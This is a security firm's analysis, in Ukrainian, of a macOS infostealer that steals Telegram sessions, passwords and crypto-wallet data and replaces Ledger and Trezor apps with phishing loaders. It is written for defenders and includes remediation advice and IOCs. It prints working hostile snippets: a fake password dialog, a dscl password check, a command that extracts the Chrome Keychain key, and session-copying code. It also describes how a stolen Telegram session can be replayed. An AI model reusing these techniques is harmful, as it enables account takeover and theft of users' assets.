Як macOS троян може обійти захист, втрата облікового запису TG та підміна гаманця?
Троян для macOS краде дані TG та гаманців, а також замінює клієнт апаратного гаманця для здійснення подвійної атаки на активи.
Автор: Команда безпеки SlowMist
Фон
Нещодавно система моніторингу безпеки MistEye зафіксувала троян для крадіжки даних, що працює на macOS. Команда SlowMist негайно розпочала аналіз.
З огляду на список крадіжок, зразок виглядає так, ніби він проводить безцільний збір даних: macOS Keychain, куки Safari, Apple Notes, локальні дані Telegram Desktop, а також бази даних десятків цифрових гаманців були включені до цільового переліку.
У попередній статті «Аналіз фішингових запитів у спільноті Google Sites та трояну для macOS» ми відповіли на питання «Що вкрадено трояном». Але копіювання файлів не означає, що обліковий запис вже втратив контроль, а вивезення бази даних гаманця не означає, що мнемонічна фраза вже скомпрометована. Тому в цій статті ми ставимо додаткове питання:
Чи можуть ці вкрадені файли дійсно перетворитися на контроль над обліковим записом та активами?
Ми відтворили шлях, залишений зразком, у ізольованому середовищі. Спочатку ми відновили файли сеансів Telegram Desktop, скопійовані зразком, на Mac, що сумісний за версією, а потім запустили клієнт.
Екран входу не з'явився.
Не було запиту на введення номера телефону, не було відправлення коду підтвердження, і не було запиту на введення пароля двоетапної перевірки Telegram. Клієнт безпосередньо відновив попередній стан облікового запису та почав синхронізувати історію чатів.
Цей крок вперше перетворив ланцюг атаки з «статичного файлу» на спостережуваний результат: зловмисник не переніс звичайну конфігурацію, а отримав вже сертифікований локальний пропуск.
Потім ми перевірили ще один шлях: база даних гаманця та кандидатські паролі можуть з'єднуватися в офлайн-середовищі; зразок також видалить оригінальний клієнт гаманця, замінивши його віддаленою веб-обгорткою з оригінальною назвою та значком.
Ці, здавалося б, розрізнені функції в кінцевому підсумку утворили повний ланцюг захоплення:
Спочатку збираються паролі, матеріали для розблокування та наявні сеанси входу;
Переноситься локальний сеанс Telegram Desktop, який вже авторизовано;
Копіюється база даних гаманця та стан розширення гаманця браузера;
У середовищі зловмисника намагаються офлайн-розшифрувати;
Одночасно видаляється оригінальний гаманець, замінюється на віддалений додаток WebView, що спонукає користувача добровільно подати мнемонічну фразу.
Ця стаття базується на звіті про статичний аналіз основного зразка, звіті про статичний аналіз трьох пакетів заміни гаманця, логіці, відновленій аналітиками на основі дизасемблювання, а також на допоміжних матеріалах LevelDB, використаних для офлайн-доказів.
Крок 1: Збір паролів та матеріалів для розблокування
Сеанси Telegram можуть бути безпосередньо відновлені не тому, що зловмисник зламав пароль Telegram. Базу даних гаманця можна спробувати розшифрувати не тому, що програмне забезпечення гаманця не зашифроване.
Зловмисник спочатку повинен зібрати якомога більше паролів, матеріалів для розблокування та дійсних сеансів входу. Keychain, бази даних браузера, Apple Notes та підроблені вікна введення паролів є частинами цього етапу.
Фішингове вікно введення пароля:
Зразок виводить підроблене вікно введення пароля, що маскується під оновлення Google API connector:
set passwen to display dialog "GAPI_Update requires administrator access to update Google API connector. Enter your password to allow this." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Password Request" with hidden answer text returned of passwen
Це не просто збір вмісту з поля введення. Зразок потім використовує команду dscl macOS для перевірки, чи дійсно цей пароль може пройти аутентифікацію на локальному комп'ютері:
dscl . authonly '<поточне ім'я користувача>' '<кандидатський пароль>'
Це означає, що зразок намагається підтвердити, що користувач вводить локальний пароль для входу, а не випадковий рядок. Після успішної перевірки цей пароль може бути використаний для подальшого підвищення привілеїв, видалення додатків тощо.
Збір облікових даних браузера та Keychain:
Тим часом зразок намагається прочитати ключ шифрування Chrome Safe Storage з Keychain:
security find-generic-password -ga "Chrome"2>&1 >/dev/null | sed -n 's/^password: "(.*)"/\1/p'
Результат записується у тимчасовий файл masterpass-chrome. Chrome Safe Storage можна розуміти як ключ розшифрування, збережений браузером у Keychain macOS. Маючи його, зловмисник може забрати зашифровані дані входу та куки Chrome для подальшого аналізу у своєму середовищі.
Обсяг збору браузера зразка охоплює браузери на базі Chromium, такі як Chrome, Brave, Edge, Vivaldi, Opera тощо; цільові файли включають Login Data, Cookies, Web Data, formhistory.sqlite тощо; для браузерів, таких як Firefox, зосереджуються на logins.json, key4.db та даних куків.
Зразок також визначає та збирає:
Keychains/login.keychain-db
Group Containers/group.com.apple.notes/NoteStore.sqlite
Чи зберігаються паролі, мнемонічні фрази гаманця, Telegram Passcode або коди відновлення в Notes, залежить від записів користувача. Але на рівні коду вже існує можливість читати облікові записи та вміст.
Отже, на цьому етапі зловмисник отримує не один окремий пароль, а набір матеріалів, які можуть доповнювати один одного:
- Прямий пароль: macOS пароль, отриманий з підробленого вікна;
- Матеріали для розблокування: Keychain, Chrome Safe Storage та зашифровані бази даних браузера;
- Еквіваленти облікових даних: куки, вміст Notes, а також подальші дані сеансів та гаманців.
Ці матеріали окремо можуть не бути достатніми для захоплення облікового запису або гаманця, але вони підготували ключі для подальшого «переміщення сеансів» та «офлайн-розшифровки».
Крок 2: Перенесення сеансів Telegram
Локалізація каталогу сеансів tdata:
Зразок націлений не на веб-версію Telegram або мобільний додаток, а на настільний клієнт Telegram Desktop. Він локалізує:
~/Library/Application Support/Telegram Desktop/tdata/
Тут tdata можна просто розуміти як набір даних сеансів, які Telegram Desktop зберігає на локальному комп'ютері для підтримки стану входу.
Зразок копіює файли, пов'язані з ключами, конфігурацією та станом сеансу, включаючи:
- key_datas: пов'язані з локальними ключами або конфігурацією tdata;
- <name>s: пов'язані з локальним станом сеансу;
- <name>/maps: частина відображення даних сеансу.
Згідно з відновленою еквівалентною логікою, зразок спочатку копіює key_datas, а потім обходить каталог у пошуках парних файлів сеансу, записуючи відповідні дані в тимчасовий каталог:
std::string src = app_support + "Telegram Desktop/tdata/";std::string dst = staging + "tg/";
copy_file(src + "key_datas", dst + "key_datas");
std::vector<std::string> names = list_directory_names(src);for (conststd::string& name : names) {if (contains(names, name + "s")) { copy_file(src + name + "s", dst + name + "s"); copy_file(src + name + "/maps", dst + name + "/maps"); }}
Це не «пошук кількох імен файлів Telegram», а чіткий ланцюг копіювання файлів сеансу. Після завершення копіювання основний процес стискає тимчасовий каталог та завантажує його.
Відновлення сеансу, обхід входу:
Щоб перевірити реальні ризики цих файлів після передачі, ми підготували сумісний за версією Telegram Desktop (macOS 12.7 / Telegram Desktop 4.16) в ізольованому середовищі та відновили ключові файли, вкрадені зразком, до відповідного місця.
Тестування використання тестового облікового запису без прив'язки до реальних активів, обліковий запис активував Telegram 2FA (двофакторна автентифікація), але не активував пароль для Telegram Desktop.
Після відновлення файлів і запуску клієнта, процес входу не вимагав:
- Введення номера телефону;
- SMS-коду;
- Пароля для двофакторної автентифікації Telegram.
Клієнт безпосередньо відновив стан входу в обліковий запис, після чого почав синхронізувати історію чату.
Це означає, що зловмисникам не потрібна нова авторизація облікового запису, а лише дійсна локальна сесія.
Вони не крадуть пароль для входу, а отримують вже перевірений «пропуск».
Повторне використання сесії проти зламу 2FA:
Тут потрібно розрізняти «обхід 2FA» та «повторне використання існуючої сесії».
Двофакторна автентифікація Telegram головним чином захищає нові процеси авторизації облікових записів. Коли зловмисник безпосередньо відновлює вже авторизовані локальні сесії, клієнт не виконує повний процес автентифікації з номером телефону, кодом підтвердження та паролем для двофакторної автентифікації.
Отже, точніше буде сказати, що зловмисник повторно використовує вже авторизовану локальну сесію, тому 2FA не спрацьовує знову. Це не означає, що пароль 2FA Telegram був зламаний, а те, що весь процес повторного використання взагалі не потрапив у стадію, де потрібно перевіряти цей пароль.
Користувач може не відразу помітити аномалію:
У цих умовах тестування скопійована сесія не стабільно відображається в списку пристроїв як чіткий, окремий запис нового авторизованого пристрою. Це означає, що навіть якщо користувач активно перевіряє вже авторизовані пристрої, він може не відразу усвідомити, що локальні дані сесії вже були скопійовані.
Коли оригінальний пристрій і пристрій-відновлювач використовуються одночасно протягом тривалого часу, сервер може анулювати сесію на одному з кінців і вимагати повторного входу. Але під час коротких, переривчастих тестів доступу сесія не була негайно примусово завершена.
Аномальне виявлення на сервері може скоротити час існування частини вкрадених сесій, але не може замінити захист локальних даних tdata.
Якщо Telegram Desktop активує пароль, після відновлення сесії зловмисник все ще може бути змушений ввести цей пароль. Це дійсно може додати ще один рівень захисту, але цей троян також збирає дані з Keychain, Apple Notes та браузерів. Якщо користувач коли-небудь записував пароль Telegram у цих місцях або повторював паролі між кількома додатками, цей захист все ще може бути обійдено.
tdata може бути додатково перетворено на API сесію:
Крім вищезазначених способів, ми також виявили, що отримавши tdata Telegram, можна поєднати opentele, Telethon, авторизований AuthKey та параметри API офіційного клієнта, щоб перетворити локальний стан входу на програмовану сесію Telegram API для читання діалогів, історії повідомлень та надсилання повідомлень. Тестування показало, що скрипти можуть використовувати короткочасні, переривчасті з'єднання, не потребуючи тривалого перебування онлайн, що знижує ризик негайного виклику аномального виходу. Оскільки повторно використовується оригінальна авторизація, новий вхід пристрою не буде створено, і в списку авторизованих пристроїв не з'явиться чіткий, окремий запис нового пристрою, користувачеві важко вчасно виявити аномалію, перевіряючи авторизовані пристрої.
Telegram для macOS також має ризик повторного використання сесії:
Вищезазначений аналіз стосується Telegram Desktop (кросплатформеного настільного клієнта на базі Qt). Але Telegram також пропонує ще один рідний клієнт для macOS ------ Telegram для macOS (незалежно завантажений Swift-версія через App Store або офіційний сайт). Тестування цієї версії показало, що її локальні файли сесії також можуть бути скопійовані та безпосередньо відновлені на іншому Mac: без номера телефону, коду підтвердження або пароля для двофакторної автентифікації можна увійти в обліковий запис, і в списку авторизованих пристроїв не з'явиться новий запис, що представляє пристрій-відновлювач.
Крім того, Telegram для macOS має одну помітну різницю в реакції механізмів безпеки в порівнянні з Telegram Desktop: коли сервер виявляє аномальну поведінку входу, Telegram для macOS не буде примусово виходити з системи та очищати локальні дані, як це робить версія Desktop. У нашому тестуванні клієнт, позначений механізмом безпеки, хоча не міг надсилати нові повідомлення або отримувати нові повідомлення, все ще міг зберігати відкритий інтерфейс, що дозволяло зловмиснику продовжувати переглядати та переглядати вже наявні історії чатів. Це означає, що навіть якщо сервер вже відреагував, раніше кешовані історії повідомлень все ще можуть бути повністю відновлені, і не буде примусового виходу, який би перешкоджав цьому.
Це означає, що в цьому сценарії атаки рідний клієнт macOS не лише не може бути виявлений користувачем через «нові авторизовані пристрої», але й після виявлення аномалії сервером історії чатів все ще залишаються відкритими ------ зловмисник, хоча і втратив можливість надсилати та отримувати повідомлення в реальному часі, все ще може повністю читати кешовані історії.
На цьому етапі шлях Telegram вже зрозумілий: чи то Telegram Desktop, чи Telegram для macOS, зловмисникам не потрібно повторно входити в обліковий запис, їм потрібно лише перенести вже авторизовану локальну сесію з Mac жертви до свого середовища.
Крок 3: Вкрасти дані гаманця
Сесії Telegram можуть бути безпосередньо повторно використані, тоді як база даних гаманця зазвичай має ще один рівень шифрування. Метод зразка полягає в тому, щоб спочатку скопіювати якомога більше даних гаманця, залишаючи простір для подальшого аналізу.
16 видів гаманців повністю охоплені:
Зразок шукатиме 16 видів локальних гаманців або клієнтів для управління гаманцями, включаючи програмні гаманці, клієнти повних вузлів класу Core, а також супутні програми для апаратних гаманців:
- Програмні гаманці: Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Electrum LTC, Electron Cash, Guarda, Sparrow;
- Клієнти класу Core: Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core;
- Супутні клієнти для апаратних гаманців: Ledger Live, Trezor Suite.
Різні каталоги даних гаманців, формати бази даних і методи шифрування не однакові, але основна стратегія зразка є однією: локалізувати каталоги, копіювати бази даних гаманців і конфігураційні файли, упакувати та передати, продовжуючи аналіз у середовищі зловмисника.
Під час копіювання зразок пропускає кеш, Code Cache, Crashpad, журнали, медіа, дзвінки та інші каталоги кешу та шуму, надаючи перевагу збереженню даних про облікові записи та стан гаманців.
Це призводить до легко недооцінюваного наслідку: навіть якщо дані гаманця зашифровані, як тільки повна база даних вже передана, зловмисник може відірватися від пристрою жертви і повторно спробувати розшифрувати. Жертва закриває гаманець, відключає мережу або навіть видаляє троян, але не може повернути вже скопійовані дані.
Збір даних з розширень браузера:
Окрім настільних гаманців, зразок також просканує каталоги конфігурацій понад десяти браузерів на основі Chromium, таких як Chrome, Brave, Edge, Vivaldi, Opera.
Він збирає файли Cookie, дані для входу, дані веб-форм, а також локальне сховище розширень і дані IndexedDB для кожного каталогу Default або Profile браузера. Зразок вбудував 223 ID розширень, пов'язаних з гаманцем, щоб відфільтрувати та скопіювати локальне сховище розширень крипто-гаманців.
Ці дані не є відкритими мнемонічними фразами, але можуть містити Vault гаманця, конфігурацію облікового запису, статус авторизації та матеріали для входу в браузер, які можуть бути використані для офлайн-аналізу, міграції статусу та подальшої цілеспрямованої фішингової атаки.
На цьому етапі зловмисник вже має два ключових матеріали: з одного боку, зашифровану базу даних гаманця, з іншого боку, зібрані з системи, браузера та Notes кандидатури паролів. Наступний крок - подивитися, чи можна поєднати ці два матеріали.
Крок 4: Офлайн-розшифровка гаманця
На прикладі Atomic Wallet:
Ми вибираємо Atomic Wallet для локального відновлення. Зразок скопіює локальний каталог зберігання Atomic Wallet у форматі LevelDB. LevelDB - це поширений формат локальної бази даних, у якому гаманець зберігає статус облікового запису та чутливі дані.
Дані в цьому каталозі зашифровані за допомогою AES-256-CBC, для розшифровки потрібен пароль гаманця.
Отже, отримання окремого файлу LevelDB не означає, що зловмисник отримав відкриті мнемонічні фрази. Пароль гаманця все ще є бар'єром між базою даних і чутливими даними.
Але цей бар'єр потрібно розглядати в контексті всієї атаки.
Спроби багатократних паролів:
У ізольованому тестовому середовищі (Atomic Wallet 2.70) ми відновили дані, скопійовані з LevelDB, і по черзі використовували кандидати на паролі, зібрані з Keychain, менеджера паролів браузера, Apple Notes тощо, для розшифровки.
Врешті-решт, кандидати на паролі успішно розкрили дані, що містять матеріали контролю активів.
Цей етап виявив найнебезпечніше місце зразка: зловмисник не обов'язково повинен шукати вразливості в програмному забезпеченні гаманця, і не потрібно в реальному часі на комп'ютері жертви намагатися вгадати пароль.
Він просто повинен одночасно забрати дві речі: зашифровану базу даних гаманця та набір можливих паролів, що належать користувачу. База даних схожа на сейф, що був переміщений, а кандидати на паролі — це набір запасних ключів з різних джерел. Зловмисник може перевіряти їх один за одним у безстроковому офлайн-середовищі.
Передача приватного ключа є незворотною:
Якщо приватний ключ, мнемонічна фраза або еквівалентні матеріали контролю активів були відновлені, ризик більше не обмежується певним клієнтом гаманця. Зловмисник може відновити ту ж групу адрес в іншому сумісному гаманці та отримати контроль над відповідними активами.
У цей момент зміна пароля програми, повторна установка клієнта або навіть видалення локальних файлів гаманця не можуть зробити вже вкрадені приватні ключі або мнемонічні фрази недійсними.
На цьому етапі шлях офлайн-розшифровки даних гаманця вже зрозумілий. Але зразок не зупинився на цьому — для кількох цінних цілей він також розгорнув інший паралельний шлях атаки.
Крок 5: Заміна програми гаманця
Завантаження шкідливого ZIP для заміни програми:
У основному зразку ми виявили набір операцій, які явно відрізняються від звичайного викрадення файлів: троян завантажить три ZIP-файли з віддаленого сервера в каталог /tmp, одночасно видаляючи оригінально встановлені Ledger Live, Ledger Wallet і Trezor Suite.
Функція swap_app() в основному зразку виконує повний процес заміни: завантажує архів за допомогою curl, завершує запущені процеси гаманця за допомогою pkill, потім видаляє оригінальний додаток за допомогою rm -rf, за необхідності підвищує привілеї через sudo, і нарешті використовує ditto для розпакування архіву в /Applications.
Заміна пакета є лише веб-завантажувачем:
Згідно з іменами файлів та значками, ці ZIP-файли, здається, відповідають трьом легітимним клієнтам гаманця. Але реверс-аналіз показує, що вони не реалізують справжню функцію гаманця.
Основний виконавчий процес трьох замінних програм дуже схожий: читання прихованих конфігурацій, розшифровка віддаленого маршруту за допомогою XOR, складання повного URL, створення WKWebView з увімкненим JavaScript, а потім завантаження віддаленої сторінки, контрольованої зловмисником.
WKWebView можна розглядати як веб-вікно, вбудоване в настільний додаток. Воно дозволяє віддаленій веб-сторінці покривати інтерфейс програми, не з'являючись у вигляді вкладки браузера.
Статичний аналіз підтверджує, що пакет заміни активує JavaScript і зберігання даних, але не виявляє реальних бізнес-реалізацій Ledger або Trezor: немає USB/HID зв'язку, немає перерахування апаратних пристроїв, немає похідних ключів BIP39/BIP32, і немає побудови транзакцій або локального підпису.
Іншими словами, ці програми не є модифікованими клієнтами гаманця, а є веб-завантажувачами, що мають назву та значок гаманця.
Три замінні програми врешті-решт завантажують віддалену адресу:
Ledger Live і Ledger Wallet вказують на один і той же маршрут /ledger, тоді як Trezor Suite завантажує маршрут /trezor. Віддалена сторінка означає, що зловмисник може змінювати вміст сторінки, текст взаємодії та логіку подання даних у будь-який час, не повторно публікуючи локальний додаток.
Фішингова сторінка за значком на робочому столі:
Коли користувач запускає ці замінені "гаманці", віддалена сторінка може маскуватися під процес відновлення, перевірки або ініціалізації гаманця, спонукаючи користувача ввести мнемонічну фразу, PIN-код, пароль або інші матеріали для відновлення.
Для звичайного користувача це важче розпізнати, ніж традиційні фішингові веб-сторінки. Сторінка не з'являється у вкладці браузера, а з'являється в настільному додатку, встановленому в каталозі /Applications, з знайомою назвою та значком.
Користувач може подумати, що це процес перевірки після оновлення гаманця, або що він виконує відновлення облікового запису відповідно до офіційних вказівок.
Якщо користувач на цій віддаленій сторінці введе мнемонічну фразу, зловмисник отримає не просто тимчасовий доступ до певного додатку, а найвищі контрольні повноваження над активами гаманця.
Офлайн-розшифровка полягає в пошуку мнемонічної фрази серед вже існуючих даних; заміна програми ж спонукає користувача самостійно ввести мнемонічну фразу. Обидва шляхи працюють паралельно, не залежать один від одного.
Панорама атаки
Оглядаючи початковий список викрадення, Keychain, Cookie, Notes, Telegram і файли гаманця здаються незалежними цілями. Після відтворення їхні зв'язки стають зрозумілими:
- Keychain, браузер і Notes надають паролі, Passcode та інші матеріали для розблокування;
- Cookie Safari можуть надати ще активну веб-сесію входу;
- tdata Telegram надає вже авторизовану сесію облікового запису;
- База даних гаманця надає зашифровані дані, які можуть бути вкрадені, скопійовані та проаналізовані офлайн;
- Замінені програми Ledger і Trezor ведуть користувача до віддаленої фішингової сторінки з іншого незалежного шляху.
Кожен модуль окремо виглядає як звичайна крадіжка. Справжня небезпека полягає в тому, що зразок може об'єднати ці матеріали.
Для Telegram зловмисник не обходить силу пароля, а обминає саму повторну авторизацію. Для локального гаманця зловмисник використовує одночасне викрадення зашифрованих даних і матеріалів пароля. Для Ledger і Trezor зловмисник навіть не намагається зламати вже наявні дані, а через заміну клієнта переосмислює "достовірний інтерфейс" в очах користувача.
Справжнє, що потрібно зловмиснику, часто не є окремим паролем, а одночасне отримання авторизованих сесій, зашифрованих даних і матеріалів для розблокування.
Підсумок
Цей троян не викрав кілька ізольованих паролів або файлів, а цілу систему локальної довіри, яку користувач поступово створював на одному Mac: вже авторизовані сесії, збережені паролі, зашифровані гаманці та довіра до самого настільного додатку.
Коли ці речі одночасно залишають пристрій, від витоку інформації до захоплення облікового запису, а потім до крадіжки цифрових активів, лише одна успішна комбінація даних відділяє їх.
Подвійний шлях атаки на гаманці. Зразок підготував два резервних шляхи для активів гаманця: перший шлях — викрадення бази даних гаманця та кандидатів на паролі для офлайн-розшифровки; другий шлях — заміна клієнта апаратного гаманця, завантаження віддаленої сторінки та спонукання користувача до активного введення мнемонічної фрази. Обидва шляхи працюють паралельно, охоплюючи "пасивне викрадення" та "активне спонукання".
Використання сесій повторно, а не злам паролів. Зловмисник безпосередньо копіює вже авторизовані локальні файли сесій, відновлюючи стан входу в новому середовищі, не викликаючи процес повторної авторизації.
Комбінування багатократних джерел свідчить про використання. Зразок не покладається на єдине джерело пароля, а збирає кандидатів на паролі з Keychain, менеджера паролів браузера, Apple Notes та маскованих діалогових вікон, підвищуючи шанси на офлайн-розшифровку бази даних гаманця.
Рекомендації
- Якщо ви підозрюєте, що ваш пристрій може бути заражений, терміново заверште всі існуючі сесії Telegram на надійному пристрої, відновіть надійний стан входу та змініть пароль двофакторної аутентифікації та Passcode. Лише зміна пароля 2FA може не відразу зробити вже скопійовані локальні сесії недійсними.
- Якщо база даних гаманця або матеріали приватного ключа можуть бути втрачені, слід на чистому пристрої або надійному апаратному гаманці створити абсолютно нову мнемонічну фразу, якомога швидше перемістити активи на нову адресу та припинити використання старої мнемонічної фрази. Лише зміна пароля програми гаманця не може зробити вже вкрадені приватні ключі або мнемонічні фрази недійсними.
- Змініть паролі, збережені або повторно використані в Keychain, Apple Notes і браузері, зосередивши увагу на електронній пошті, біржах, хмарних сховищах, менеджерах паролів та соціальних акаунтах, а також вийдіть з існуючих сесій входу в цих службах.
Для можливих видалених і замінених клієнтів Ledger або Trezor спочатку видаліть підозрілі програми, перевірте підпис коду та джерело установки, перевірте відповідні пункти зберігання (наприклад, LaunchDaemon), а потім отримайте установочний пакет з офіційних надійних джерел. Якщо ви вводили мнемонічну фразу в замінених програмах, терміново обробляйте її як вкрадену.
Для рідко використовуваних клієнтів Telegram (наприклад, тих, що встановлені лише на певних пристроях, але довгий час не відкриваються, таких як Desktop або рідний клієнт macOS) слід регулярно перевіряти їхній статус входу або активно завершувати непотрібні сеанси. Оскільки такі клієнти використовуються рідко, навіть якщо сесія буде вкрадена і відновлена в середовищі зловмисника, користувачеві буде важко вчасно виявити аномалії. --- Безпекові перевірки на сервері зазвичай залежать від змін у поведінці активних сеансів, а для клієнтів, які довгий час перебувають у стані бездіяльності, аномальне входження важче автоматично виявити. Як тільки сесія буде вкрадена, зловмисник може тривалий час підтримувати тихий контроль над цим обліковим записом, постійно читати нові повідомлення, не викликаючи жодних тривог.
- У повсякденному використанні слід активувати Passcode для Telegram та встановити високоякісний пароль, який відрізняється від інших паролів, уникаючи використання слабких паролів, щоб підвищити захист локальних сеансів.
IOC
IP
192[.]253[.]248[.]181
86[.]54[.]25[.]213
URL
http[://192[.]253[.]248[.]181/web/ledger.zip
http[://192[.]253[.]248[.]181/web/ledgerwallet.zip
http[://192[.]253[.]248[.]181/web/trezor.zip
http[://86[.]54[.]25[.]213/ledger?username=night
http[://86[.]54[.]25[.]213/trezor?username=night
http[://86[.]54[.]25[.]213/log
Шкідливі файли
filename: ledger.zip
SHA256: 41d77fef030b8515efb068defed5e15c14fbebd16259253f1f79febd6e12ebcb
filename: ledgerwallet.zip
SHA256: 36f4ae11560ed34f32c927468a09a5370a5fbdcae41660f6e8d9a49330c8d059
filename: trezor.zip
SHA256: 60f33e7b8c6b84839e28c710c8c5a99a718c0b88135653561be8d45f976b794f
Відмова від відповідності: цей контент надано лише для загальних брендингових та інформаційних цілей і не є фінансовою, інвестиційною, юридичною чи податковою консультацією. Події, нагороди, онлайн-події або пов’язану інформацію, згадана тут, не слід розглядати як рекомендацію, прохання чи запрошення до купівлі, продажу, торгівлі чи інших операцій з криптоактивами або використання послуг. Криптоактиви є дуже волатильними та можуть призвести до збитків. Послуги WEEX та онлайн-події можуть бути недоступні в усіх регіонах та підпадають під дію чинних законів, правил та вимог до участі. Ви несете відповідальність за забезпечення відповідності використання вами послуг WEEX місцевому законодавству та за ретельну оцінку ризиків перед участю в діяльності, пов’язаній з криптовалютами.
Вам також може сподобатися

Законопроєкт «Clarity Act» стикається з ризиками після вимог демократів щодо нових етичних норм

Крипто-клірингова компанія Glacis Labs залучила 6,8 мільйона доларів на розширення платформи ZeroDelta

SBI використовує Solana для першого у світі токенізованого фонду акцій Японії

Stablecoins та долари «не повинні розглядатися окремо», каже брокер

Парадокс конфіденційності захисту дітей в Інтернеті

Крипто Лонг і Шорт: Чи варто інвестувати в ETH — чи SOL є кращим диверсифікатором?

Порівняння білого паперу Ethereum та XRP (2026): Архітектура, консенсус та ключові відмінності

Невидимий крипто-ландшафт фінансового гіганта Японії SBI

Легка промисловість хоче окрему комісію з торгівлі з Туреччиною

75% прибуток Core Scientific від угоди з ШІ не є шаблоном для майнерів біткоїнів, стверджує Bernstein

DTCC запускає послугу токенізації цінних паперів, початковими об'єктами є близько 1000 американських акцій та облігацій

Партнер Multicoin Capital Тушар Джайн: Ринок досяг дна! Оптимістичні прогнози для SOL, HYPE та ZEC

Глобальні інвестиції в фінансові технології зросли, але кількість угод різко зменшилася… "селекційні інвестиції" стають помітними

«Великий бик» Том Лі: найбільшими короткостроковими вигодами від продуктивності ШІ є фінансові послуги, підвищено цільовий рівень S&P 500 до 8000 пунктів

52% українців розглядають Карпати як варіант літньої відпустки – опитування

Американський ринок акцій як доля нації: Трамп перетворює США на фонд

Ринки прогнозів досягли $100 млн річного доходу за два місяці: найшвидший продукт Coinbase

Як почати користуватися обліковим записом Olive|Пояснення інтеграції з SBI Securities та відкриття рахунку

5 графіків для розуміння крипторинку у другому кварталі: сплеск RWA, фундаментальні показники продовжують покращуватись

Сон Юйчень і його погляди на ядерну енергетику: тихий початок хвилі IPO

Noxa заробила за три дні і зникла: що зараз відбувається з Robinhood Chain

Galaxy представила DeFi-кредит з "щитком" на 100 мільйонів доларів

Чому акції обладнання відходять на другий план, коли акції AI-семікондукторів продовжують зростати?

Pudgy Penguins оголосили: у 2026 році на Comic-Con у Сан-Дієго буде представлено оригінальну комікс-серію про Пакса Пінгвіна та Поллі

SBI, DigiFT та Startale запускають PoC для фондів акцій з токеном JPYSC

Чи потрібна пауза для ШІ, і хто має право її натиснути?

Професор Сакаї з університету Кейо говорить про «Століття прогнозних ринків: соціальна реалізація колективного розуму»|WebX2026

Що таке тест Хоуі? Правило 1946 року, яке визначає, які токени є цінними паперами

Важливі новини за ніч та ранок (14-15 липня)












